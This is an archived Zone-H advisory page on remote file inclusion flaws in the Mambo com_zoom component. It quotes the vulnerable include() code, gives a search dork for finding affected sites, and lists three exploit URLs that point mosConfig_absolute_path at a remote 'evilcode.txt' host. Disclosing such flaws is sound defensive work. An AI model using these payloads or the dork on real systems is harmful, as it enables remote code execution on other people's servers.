Advertisement
Home arrow ITsec Advisories arrow Mambo Components com_zoom Remote File inclusion vulnerabilities
Thursday, 07 August 2008
  
 
Last week attacks
O.S.  Defs.  %
Linux  7426  78.14%
Win 2003  1431  15.06%
FreeBSD  368  3.87%
Win 2000  180  1.89%
Unknown  60  0.63%
Other  39  0.41%

Total attacks: 9504 of which 3252 single ip and 6252 mass defacements

Main Menu
Home
Digital Warfare
Geopolitics
ITsec News
ITsec Advisories
Test Drive
360°
Digital Attacks Archive
Zone-H events
Publications
Zone-H Friends/Partners
Contact Us
Search
Download Area
Zone-H forum
About this website
Login Form





Lost Password?
No account yet? Register
Visitors' Map
Mambo Components com_zoom Remote File inclusion vulnerabilities PDF Print E-mail
User Rating: / 5
PoorBest 
Written by Marcelo Almeida (Vympel)   
Thursday, 10 August 2006
Mambo Components com_zoom Remote File inclusion Bugs
Author : Thehacker                                                                                     
Date Found : 10.08.2006                                                                                
Location : Turkey                                                                                      
Critical Level : High                                                                                  
Vulnerability : view.php                                                                               
include($mosConfig_absolute_path.'/components/com_zoom/classes/fs_win32.php');                         
include($mosConfig_absolute_path.'/components/com_zoom/classes/fs_unix.php');...

Dork : inurl:com_zoom                                                                         
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://evilcode.txt?  /components/com_zoom/classes/fs_win32.php?mosConfig_absolute_path=http://evilcode.txt?  /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://evilcode.txt?

Greetz : All Bro and All Turkish Hackers
Contact : root{at}Local-Root{dot}org


Comments Index (Total Messages: 2)
Workaround Written by Guest on 2006-08-11 07:24:53
Re: Workaround Written by Guest on 2006-08-11 11:20:17

Powered by a Zone-H(ified) version of AkoComment 3.0!


DISCLAIMER: Forum postings are the opinion of the posting author alone, and should not be taken as the opinion of Zone-h. The   author is entirely and solely responsible for all content that he/she uploads, posts, or otherwise transmits via the website. Zone-h is not responsible for such content. However, Zone-h shall have the right, but not the obligation, to delete, move, or edit any content that violates this agreement or is otherwise objectionable as determined by Zone-h in its sole discretion and without notice.
 
< Prev   Next >
[ Back ]
 
Top!
© 2008 Zone-H.org
Joomla! is Free Software released under the GNU/GPL License.
 Top!